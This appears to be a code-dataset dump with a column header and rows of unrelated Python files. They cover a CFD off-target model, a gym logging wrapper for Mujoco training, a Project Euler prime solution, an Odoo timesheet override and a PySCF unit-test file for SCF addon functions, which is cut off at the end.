max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
|---|---|---|---|---|---|---|
amocrm_api_client/token_provider/impl/standard/__init__.py
|
iqtek/amocrm_api_client
| 0
|
12783851
|
<filename>amocrm_api_client/token_provider/impl/standard/__init__.py
from .StandardTokenProviderFactory import StandardTokenProviderFactory
| 1.203125
| 1
|
elevation/models.py
|
michael-weinstein/Elevation
| 96
|
12783852
|
import numpy as np
import elevation.model_comparison
import os
import pandas
import multiprocessing
cur_dir = os.path.dirname(os.path.abspath(__file__))
class CFDModel(object):
def __init__(self, cfd_table=None, cfd_table_file=None):
if cfd_table is None:
#print "Loading CFD table from file"
self.cfd_table = elevation.model_comparison.get_NBT_cfd(cfd_table_file)
else:
self.cfd_table = cfd_table
self.cfd_table.index = self.cfd_table['Mismatch Type']
def fit(self):
pass
def predict(self, annots_list, num_proc=20):
if len(annots_list) == 0:
preds = 1.0
preds = np.ones(len(annots_list))
if num_proc > 1:
pool = multiprocessing.Pool(processes=num_proc)
jobs = []
for i, annots in enumerate(annots_list):
jobs.append(pool.apply_async(predict_annot, (annots, self.cfd_table)))
pool.close()
pool.join()
for i, j in enumerate(jobs):
pred = j.get()
preds[i] = pred
pool.terminate()
else:
for i, annots in enumerate(annots_list):
preds[i] = predict_annot(annots, self.cfd_table)
return preds
def predict_annot(annots, cfd_table):
pred_i = 1.0
for a in annots:
letters, pos = elevation.model_comparison.parse_mismatch_annot(a)
if pos=='':
annot_new = letters # a PAM mutation
else:
letters = str(letters)
annot_new = letters[0] + ":" + letters[1] + "," + str(pos)
if a == 'GG':
tmp_pred = 1.0
else:
tmp_pred = cfd_table["Percent-Active"].loc[annot_new]
# preds[i] = tmp_pred*preds[i]
pred_i = pred_i * tmp_pred
return pred_i
| 2.28125
| 2
|
environments/SmartMonitor.py
|
KMarino/hrl-ep3
| 17
|
12783853
|
import os
import collections
import pdb
import gym
import gym.envs.mujoco
import time
import csv
import json
import shutil
import numpy as np
import random
from . import ant_env
from . import proprioceptive_humanoid_env
from . import maze_ant
from . import maze_humanoid
# Wrapper that records everything we might care about in our environment
# All rewards (clipped and raw), states, actions, time and steps
# Copied originally from https://github.com/openai/baselines/blob/master/baselines/bench/monitor.py
class SmartMonitor(gym.Wrapper):
def __init__(self, env, log_dir, rank, opt, verbose=True, allow_early_resets=False):
super(SmartMonitor, self).__init__(env)
self.tstart = time.time()
self.episode_count = -1
# Get the rewards we want to log
# Got to be a better way to get the names of the subpart rewards, but it seems to be hardcoded in the mujoco envs
self.reward_list = ['reward_env']
if opt['model']['mode'] in ['baseline', 'baseline_reverse', 'baselinewtheta', 'baseline_lowlevel']:
self.baseline = True
elif opt['model']['mode'] in ['phasesimple', 'phasewstate', 'phasewtheta', 'phase_lowlevel']:
self.baseline = False
self.reward_list.append('reward_exp')
if opt['model']['mode'] != 'phase_lowlevel':
self.reward_list.append('reward_move')
if opt['env']['state_cycle_weight'] > 0 or opt['env']['action_cycle_weight'] > 0:
self.reward_list.append('reward_cycle')
self.reward_list.append('reward_cycle_s')
self.reward_list.append('reward_cycle_a')
elif opt['model']['mode'] == 'interpolate':
self.baseline = False
self.reward_list.append('reward_interpolate')
elif opt['model']['mode'] == 'cyclic':
self.baseline = False
self.reward_list.append('reward_cycle')
self.reward_list.append('reward_thresh')
elif opt['model']['mode'] in ['hierarchical', 'hierarchical_many']:
self.baseline = True
self.reward_list.append('reward_velocity')
self.reward_list.append('reward_goal')
elif opt['model']['mode'] in [ 'maze_baseline', 'maze_baseline_wphase']:
self.baseline = True
self.reward_list.append('reward_velocity')
self.reward_list.append('reward_goal')
else:
raise NotImplementedError
# This is currently hardcoded to Mujoco envs
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv):
self.reward_list += ['reward_forward', 'reward_ctrl', 'reward_contact', 'reward_survive']
elif isinstance(env.unwrapped, gym.envs.mujoco.AntEnv):
self.reward_list += ['reward_forward', 'reward_ctrl', 'reward_contact', 'reward_survive']
else:
raise NotImplementedError
# Data structure that holds all the values we want to log
self.episode_struct = collections.OrderedDict()
all_keys = self.reward_list + ['obs', 'action', 'env_count', 'episode_count']
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(env.unwrapped, gym.envs.mujoco.MujocoEnv):
all_keys += ['state']
# Log the distances
if opt['model']['mode'] in ['hierarchical', 'hierarchical_many', 'maze_baseline', 'maze_baseline_wphase']:
if isinstance(env.unwrapped, maze_humanoid.ProprioceptiveHumanoidMazeEnv) or isinstance(env.unwrapped, maze_ant.AntMazeEnv):
all_keys += ['goal_distance', 'goal_distance_radius']
for key in all_keys:
self.episode_struct[key] = []
# Create and initialize our csv files
# File to store entire episode information (rather than every single step)
# Prints total reward (for all rewards), overall obs and state displacements, episode length, and episode time
episode_filename = os.path.join(log_dir, str(rank) + '.Episode.Monitor.csv')
self.ep_f = open(episode_filename, "wt")
self.ep_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : env.spec and env.spec.id, 'mode': opt['model']['mode'], 'name': opt['logs']['exp_name']}))
ep_fields = self.reward_list + ['delta_obs', 'mean_action', 'episode_len', 'episode_dt', 'episode_count']
if isinstance(env.unwrapped, ant_env.BaseAntEnv) or isinstance(env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(env.unwrapped, gym.envs.mujoco.MujocoEnv):
ep_fields += ['delta_state']
if opt['model']['mode'] in ['hierarchical', 'hierarchical_many', 'maze_baseline', 'maze_baseline_wphase']:
if isinstance(env.unwrapped, maze_humanoid.ProprioceptiveHumanoidMazeEnv) or isinstance(env.unwrapped, maze_ant.AntMazeEnv):
ep_fields += ['goal_distance', 'goal_distance_radius']
self.ep_logger = csv.DictWriter(self.ep_f, fieldnames=ep_fields)
self.ep_logger.writeheader()
self.ep_f.flush()
# If in super verbose mode
if verbose:
# File to store every step
# Prints everything in episode_struct plus episode count
step_filename = os.path.join(log_dir, str(rank) + '.Step.Monitor.csv')
self.st_f = open(step_filename, "wt")
self.st_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : env.spec and env.spec.id, 'mode': opt['model']['mode'], 'name': opt['logs']['exp_name']}))
st_fields = list(self.episode_struct.keys())
self.st_logger = csv.DictWriter(self.st_f, fieldnames=st_fields)
self.st_logger.writeheader()
self.st_f.flush()
else:
self.st_f = None
self.verbose = verbose
self.rank = rank
self.opt = opt
self.log_dir = log_dir
# Other bookkeeping
self.allow_early_resets = allow_early_resets
self.needs_reset = True
self.total_steps = 0
self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
# Reset environment, record initial values
def reset(self, **kwargs):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
# Reset all the values in self.episode_struct
for key in self.episode_struct:
self.episode_struct[key] = []
# Update episode count
self.episode_count += 1
# Update values and return
obs = self.env.reset(**kwargs)
self.record_info(obs, 0)
self.needs_reset = False
return obs
# Take a step, update all the values
def step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
# Do step
obs, rew, done, info = self.env.step(action)
# Record new info
self.record_info(obs, rew, action, info)
# If done with episode, get summary info for episode and dump values to episode and step files
if done:
self.needs_reset = True
# For rewards, get sums
epinfo = {}
for key in self.reward_list:
reward_val = sum(self.episode_struct[key])
epinfo[key] = reward_val
# For obs and state, get delta change
epinfo['delta_obs'] = self.episode_struct['obs'][-1] - self.episode_struct['obs'][0]
if 'state' in self.episode_struct:
epinfo['delta_state'] = self.episode_struct['state'][-1] - self.episode_struct['state'][0]
# For action, get average value
epinfo['mean_action'] = np.mean(self.episode_struct['action'], axis=0)
# Update episode_len, episode_dt and episode_count
epinfo['episode_len'] = len(self.episode_struct['env_count'])
epinfo['episode_dt'] = round(time.time() - self.tstart, 6)
epinfo['episode_count'] = self.episode_count
# Update goal distances
if 'goal_distance' in self.episode_struct:
epinfo['goal_distance'] = self.episode_struct['goal_distance'][-1]
epinfo['goal_distance_radius'] = self.episode_struct['goal_distance_radius'][-1]
elif 'key_distance' in self.episode_struct:
epinfo['key_distance'] = self.episode_struct['key_distance'][-1]
epinfo['key_distance_radius'] = self.episode_struct['key_distance_radius'][-1]
epinfo['lock_distance'] = self.episode_struct['lock_distance'][-1]
epinfo['lock_distance_radius'] = self.episode_struct['lock_distance_radius'][-1]
# Do string conversion
for k in epinfo:
epinfo[k] = str(epinfo[k]).replace('\n', '')
# Update episode file
if self.ep_logger:
self.ep_logger.writerow(epinfo)
self.ep_f.flush()
# If in super verbose mode
if self.verbose:
# Make and update a temp step file with just the last episode (and only rank 0, and only every 100)
if self.rank == 0: #and self.episode_count % 100 == 0:
# Setup temp file
tmp_step_filename = os.path.join(self.log_dir, 'Tmp.Last.Step.Monitor.csv')
tmp_f = open(tmp_step_filename, "wt")
tmp_f.write('# Episode Logging %s\n'%json.dumps({"t_start": self.tstart, 'env_id' : self.env.spec and self.env.spec.id, 'mode': self.opt['model']['mode'], 'name': self.opt['logs']['exp_name']}))
st_fields = list(self.episode_struct.keys())
tmp_logger = csv.DictWriter(tmp_f, fieldnames=st_fields)
tmp_logger.writeheader()
tmp_f.flush()
else:
tmp_f = None
# Update step file
assert(self.episode_struct['env_count'][-1]+1 == len(self.episode_struct['env_count']))
for step in range(len(self.episode_struct['env_count'])):
stepinfo = {}
for key in self.episode_struct:
stepinfo[key] = self.episode_struct[key][step]
# Do string conversion
for k in stepinfo:
stepinfo[k] = str(stepinfo[k]).replace('\n', '')
# Update loggers
self.st_logger.writerow(stepinfo)
if tmp_f is not None:
tmp_logger.writerow(stepinfo)
self.st_f.flush()
# Write tmp file and close, copy tmp to last
if tmp_f is not None:
tmp_f.flush()
tmp_f.close()
# Copy tmp to last
last_step_filename = os.path.join(self.log_dir, 'Last.Step.Monitor.csv')
shutil.copyfile(tmp_step_filename, last_step_filename)
# Update info
info['episode'] = epinfo
self.total_steps += 1
return (obs, rew, done, info)
# Record step info
def record_info(self, obs, rew, action=None, info=None):
# Update all of our values
# Reward values
for key in self.reward_list:
# If reset, all 0
if info is None:
self.episode_struct[key].append(0)
else:
# For baseline, reward_env is reward
if key == 'reward_env' and self.baseline:
self.episode_struct[key].append(rew)
else:
self.episode_struct[key].append(info[key])
# Observation values
self.episode_struct['obs'].append(obs)
# State values, right now just Mujoco
if isinstance(self.env.unwrapped, ant_env.BaseAntEnv) or isinstance(self.env.unwrapped, ant_env.BaseAntLowGearEnv) or isinstance(self.env.unwrapped, proprioceptive_humanoid_env.BaseProprioceptiveHumanoidEnv) or isinstance(self.env.unwrapped, gym.envs.mujoco.MujocoEnv):
state = self.env.unwrapped.state_vector()
self.episode_struct['state'].append(state)
# Update actions
if action is None:
action = np.zeros(self.env.action_space.shape)
self.episode_struct['action'].append(action)
# Update step and episode counts
env_count = self.env._elapsed_steps
self.episode_struct['env_count'].append(env_count)
self.episode_struct['episode_count'].append(self.episode_count)
# Update distances
if 'goal_distance' in self.episode_struct:
if info is None:
self.episode_struct['goal_distance'].append(0)
self.episode_struct['goal_distance_radius'].append(0)
else:
self.episode_struct['goal_distance'].append(info['goal_distance'])
self.episode_struct['goal_distance_radius'].append(info['goal_distance_radius'])
# Close file handles
def close(self):
if self.ep_f is not None:
self.ep_f.close()
if self.st_f is not None:
self.st_f.close()
# Get total number of steps
def get_total_steps(self):
return self.total_steps
| 2
| 2
|
euler49.py
|
dchourasia/euler-solutions
| 0
|
12783854
|
<filename>euler49.py
'''
The arithmetic sequence, 1487, 4817, 8147, in which each of the terms increases by 3330, is unusual in two ways: (i) each of the three terms are prime, and, (ii) each of the 4-digit numbers are permutations of one another.
There are no arithmetic sequences made up of three 1-, 2-, or 3-digit primes, exhibiting this property, but there is one other 4-digit increasing sequence.
What 12-digit number do you form by concatenating the three terms in this sequence?
'''
import math
primes=[]
def get_primes(mx):
x=1
while x < mx:
x+=1
y=int(math.sqrt(x))
isprime=True
for z in primes:
if z > y:
break
if x%z==0:
isprime=False
break
if isprime:
primes.append(x)
get_primes(10000)
print(primes[-1])
primes = [x for x in primes if x > 999]
print(len(primes))
for i, x in enumerate(primes):
for y in primes[i+1:]:
if y + y - x in primes and set(str(x)) == set(str(y)) == set(str(y+y-x)):
print(x, y, y + y - x)
| 3.640625
| 4
|
addons14/sale_timesheet_rounded/models/sale.py
|
odoochain/addons_oca
| 1
|
12783855
|
<filename>addons14/sale_timesheet_rounded/models/sale.py
# Copyright 2019 Camptocamp SA
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl)
from odoo import api, models
class SaleOrderLine(models.Model):
_inherit = "sale.order.line"
def _get_delivered_quantity_by_analytic(self, additional_domain):
# If we land here is only because we are dealing w/ SO lines
# having `qty_delivered_method` equal to `analytic` or `timesheet`.
# The 1st case matches expenses lines the latter TS lines.
# Expenses are already discarded in our a.a.l. overrides
# so it's fine to set the ctx key here anyway.
return super(
SaleOrderLine, self.with_context(timesheet_rounding=True)
)._get_delivered_quantity_by_analytic(additional_domain)
@api.depends("analytic_line_ids.unit_amount_rounded")
def _compute_qty_delivered(self):
"""Adds the dependency on unit_amount_rounded."""
super()._compute_qty_delivered()
| 1.71875
| 2
|
pyscf/scf/test/test_addons.py
|
robert-anderson/pyscf
| 7
|
12783856
|
<filename>pyscf/scf/test/test_addons.py
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import copy
import numpy
import scipy.linalg
from pyscf import gto, lib
from pyscf import scf, dft
from pyscf.scf import addons
mol = gto.Mole()
mol.verbose = 7
mol.output = '/dev/null'
mol.atom = [
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ]
mol.basis = {"H": '6-31g',
"O": '6-31g',}
mol.build()
mf = scf.RHF(mol).run()
mol_dz = mol.copy()
mol_dz.basis = 'cc-pvdz'
mol_dz.cart = True
mol_dz.build(False, False)
mol1 = mol.copy()
mol1.spin = 2
mf_u = scf.UHF(mol1).run()
mol2 = mol.copy()
mol2.symmetry = True
mol2.build(0,0)
sym_mf = scf.RHF(mol2).run()
mol3 = mol1.copy()
mol3.symmetry = True
mol3.spin = 2
mol3.build(0,0)
sym_mf_u = scf.UHF(mol3).run()
def tearDownModule():
global mol, mf, mol_dz, mol1, mf_u, mol2, sym_mf, mol3, sym_mf_u
mol.stdout.close()
del mol, mf, mol_dz, mol1, mf_u, mol2, sym_mf, mol3, sym_mf_u
class KnownValues(unittest.TestCase):
def test_project_mo_nr2nr(self):
nao = mol.nao_nr()
c = numpy.random.random((nao,nao))
c1 = addons.project_mo_nr2nr(mol, c, mol)
self.assertAlmostEqual(abs(c-c1).max(), 0, 12)
numpy.random.seed(15)
nao = mol.nao_nr()
mo1 = numpy.random.random((nao,nao))
mo2 = addons.project_mo_nr2nr(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 83.436359425591888, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 83.436359425591888, 11)
def test_project_mo_r2r(self):
nao = mol.nao_2c()
c = numpy.random.random((nao*2,nao*2))
c = c + numpy.sin(c)*1j
c1 = addons.project_mo_r2r(mol, c, mol)
self.assertAlmostEqual(abs(c-c1).max(), 0, 12)
numpy.random.seed(15)
n2c = mol.nao_2c()
n4c = n2c * 2
mo1 = numpy.random.random((n4c,n4c)) + numpy.random.random((n4c,n4c))*1j
mo2 = addons.project_mo_r2r(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 2159.3715489514038, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 2159.3715489514038, 11)
def test_project_mo_nr2r(self):
numpy.random.seed(15)
nao = mol.nao_nr()
mo1 = numpy.random.random((nao,nao))
mo2 = addons.project_mo_nr2r(mol, [mo1,mo1], mol_dz)
self.assertAlmostEqual(abs(mo2[0]).sum(), 172.66468850263556, 11)
self.assertAlmostEqual(abs(mo2[1]).sum(), 172.66468850263556, 11)
mo2 = addons.project_mo_nr2r(mol, mo1, mol_dz)
self.assertAlmostEqual(abs(mo2).sum(), 172.66468850263556, 11)
def test_project_dm_nr2nr(self):
nao = mol.nao_nr()
dm = numpy.random.random((nao,nao))
dm = dm + dm.T
x1 = addons.project_dm_nr2nr(mol, dm, mol)
self.assertAlmostEqual(abs(dm-x1).max(), 0, 12)
numpy.random.seed(15)
mo = numpy.random.random((nao,10))
mo1 = addons.project_mo_nr2nr(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T)
dmref = numpy.dot(mo1, mo1.T)
dm1 = addons.project_dm_nr2nr(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), 73.603267455214876, 11)
def test_project_dm_r2r(self):
nao = mol.nao_2c()
dm = numpy.random.random((nao*2,nao*2))
dm = dm + numpy.sin(dm)*1j
x1 = addons.project_dm_r2r(mol, dm, mol)
self.assertTrue(numpy.allclose(dm, x1))
numpy.random.seed(15)
n2c = mol.nao_2c()
n4c = n2c * 2
mo = numpy.random.random((n4c,10)) + numpy.random.random((n4c,10))*1j
mo1 = addons.project_mo_r2r(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T.conj())
dmref = numpy.dot(mo1, mo1.T.conj())
dm1 = addons.project_dm_r2r(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), -5.3701392643370607+15.484616570244016j, 11)
def test_project_dm_nr2r(self):
numpy.random.seed(15)
nao = mol.nao_nr()
mo = numpy.random.random((nao,10))
mo1 = addons.project_mo_nr2r(mol, mo, mol_dz)
dm = numpy.dot(mo, mo.T.conj())
dmref = numpy.dot(mo1, mo1.T.conj())
dm1 = addons.project_dm_nr2r(mol, [dm,dm], mol_dz)
self.assertAlmostEqual(abs(dmref-dm1[0]).max(), 0, 11)
self.assertAlmostEqual(abs(dmref-dm1[1]).max(), 0, 11)
self.assertAlmostEqual(lib.finger(dm1[0]), -13.580612999088892-20.209297457056557j, 11)
dm1 = addons.project_dm_nr2r(mol, dm, mol_dz)
self.assertAlmostEqual(abs(dmref-dm1).max(), 0, 11)
def test_frac_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
7 0. 0 -0.7
7 0. 0 0.7'''
mol.basis = 'cc-pvdz'
mol.charge = 2
mol.build()
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -107.13465364012296, 9)
mol.charge = -1
mol.spin = 1
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.3626325837689, 9)
mol.charge = 1
mol.spin = 1
mf = scf.rhf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.10375514714799, 9)
mol.charge = 1
mol.spin = 1
mf = scf.UHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.17458104180083, 9)
mol.charge = 0
mol.spin = 0
mf = scf.RHF(mol)
mf = addons.frac_occ(mf)
self.assertAlmostEqual(mf.scf(), -108.76171800006837, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[:7], [2,2,2,2,2,2,2]))
mol.stdout.close()
def test_dynamic_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
6 0. 0 -0.7
6 0. 0 0.7'''
mol.basis = 'cc-pvdz'
mol.charge = 2
mol.build()
mf = scf.RHF(mol)
mf = addons.dynamic_occ(mf)
self.assertAlmostEqual(mf.scf(), -74.214503776693817, 9)
mol.stdout.close()
def test_follow_state(self):
mf1 = addons.follow_state(mf).run()
self.assertAlmostEqual(mf1.e_tot, mf.e_tot, 9)
mo0 = mf.mo_coeff[:,[0,1,2,3,5]]
mf1 = addons.follow_state(mf, mo0)
self.assertAlmostEqual(mf1.scf(), -75.178145727548511, 9)
self.assertTrue(numpy.allclose(mf1.mo_occ[:6], [2,2,2,2,0,2]))
def test_float_occ(self):
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom = '''
C 0. 0 0'''
mol.basis = 'cc-pvdz'
mol.build()
mf = scf.UHF(mol)
mf = addons.float_occ(mf)
self.assertAlmostEqual(mf.scf(), -37.590712883365917, 9)
mol.stdout.close()
def test_mom_occ(self):
mf = dft.UKS(mol)
mf.xc = 'b3lyp'
mf.scf()
mo0 = mf.mo_coeff
occ = mf.mo_occ
occ[0][4] = 0.
occ[0][5] = 1.
mf = addons.mom_occ(mf, mo0, occ)
dm = mf.make_rdm1(mo0, occ)
self.assertAlmostEqual(mf.scf(dm), -76.0606858747, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[0][:6], [1,1,1,1,0,1]))
mf = scf.ROHF(mol).run()
mo0 = mf.mo_coeff
occ = mf.mo_occ
setocc = numpy.zeros((2, occ.size))
setocc[:, occ==2] = 1
setocc[0][4] = 0
setocc[0][5] = 1
newocc = setocc[0][:] + setocc[1][:]
mf = addons.mom_occ(mf, mo0, setocc)
dm = mf.make_rdm1(mo0, newocc)
mf.kernel(dm)
self.assertAlmostEqual(mf.e_tot, -75.723654936331542, 9)
self.assertTrue(numpy.allclose(mf.mo_occ[:6], [2,2,2,2,1,1]))
def test_dynamic_level_shift(self):
mf = scf.RHF(mol)
mf = addons.dynamic_level_shift(mf)
mf.init_guess = 'hcore'
mf.max_cycle = 4
mf.kernel()
self.assertAlmostEqual(mf.e_tot, -75.868344714445342, 9)
def test_convert_to_scf(self):
from pyscf.x2c import x2c
from pyscf.df import df_jk
from pyscf.soscf import newton_ah
addons.convert_to_rhf(dft.RKS(mol))
addons.convert_to_uhf(dft.RKS(mol))
#addons.convert_to_ghf(dft.RKS(mol))
addons.convert_to_rhf(dft.UKS(mol))
addons.convert_to_uhf(dft.UKS(mol))
#addons.convert_to_ghf(dft.UKS(mol))
#addons.convert_to_rhf(dft.GKS(mol))
#addons.convert_to_uhf(dft.GKS(mol))
#addons.convert_to_ghf(dft.GKS(mol))
self.assertTrue(isinstance(addons.convert_to_rhf(mf), scf.rhf.RHF))
self.assertTrue(isinstance(addons.convert_to_uhf(mf), scf.uhf.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(mf), scf.ghf.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol)), scf.rhf.RHF))
self.assertTrue(isinstance(addons.convert_to_rhf(mf_u), scf.rohf.ROHF))
self.assertTrue(isinstance(addons.convert_to_uhf(mf_u), scf.uhf.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(mf_u), scf.ghf.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(sym_mf), scf.hf_symm.RHF))
self.assertTrue(isinstance(addons.convert_to_uhf(sym_mf), scf.uhf_symm.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(sym_mf), scf.ghf_symm.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(sym_mf_u), scf.hf_symm.ROHF))
self.assertTrue(isinstance(addons.convert_to_uhf(sym_mf_u), scf.uhf_symm.UHF))
self.assertTrue(isinstance(addons.convert_to_ghf(sym_mf_u), scf.ghf_symm.GHF))
mf1 = copy.copy(mf)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.rhf.RHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.rhf.RHF))
self.assertFalse(isinstance(mf1.convert_from_(mf_u), scf.rohf.ROHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.rhf.RHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.rhf.RHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.rohf.ROHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.hf_symm.RHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.hf_symm.RHF))
mf1 = copy.copy(mf_u)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.uhf.UHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.uhf.UHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.uhf_symm.UHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.uhf_symm.UHF))
mf1 = scf.GHF(mol)
self.assertTrue(isinstance(mf1.convert_from_(mf), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(mf_u), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf), scf.ghf.GHF))
self.assertTrue(isinstance(mf1.convert_from_(sym_mf_u), scf.ghf.GHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf), scf.ghf_symm.GHF))
self.assertFalse(isinstance(mf1.convert_from_(sym_mf_u), scf.ghf_symm.GHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), remove_df=False),df_jk. _DFHF))
#self.assertTrue(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), remove_df=False),df_jk. _DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), out=scf.RHF(mol), remove_df=False),df_jk. _DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), out=scf.UHF(mol), remove_df=False),df_jk. _DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), out=scf.GHF(mol), remove_df=False), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit(), out=scf.RHF(mol), remove_df=True),df_jk. _DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit(), out=scf.UHF(mol), remove_df=True),df_jk. _DFHF))
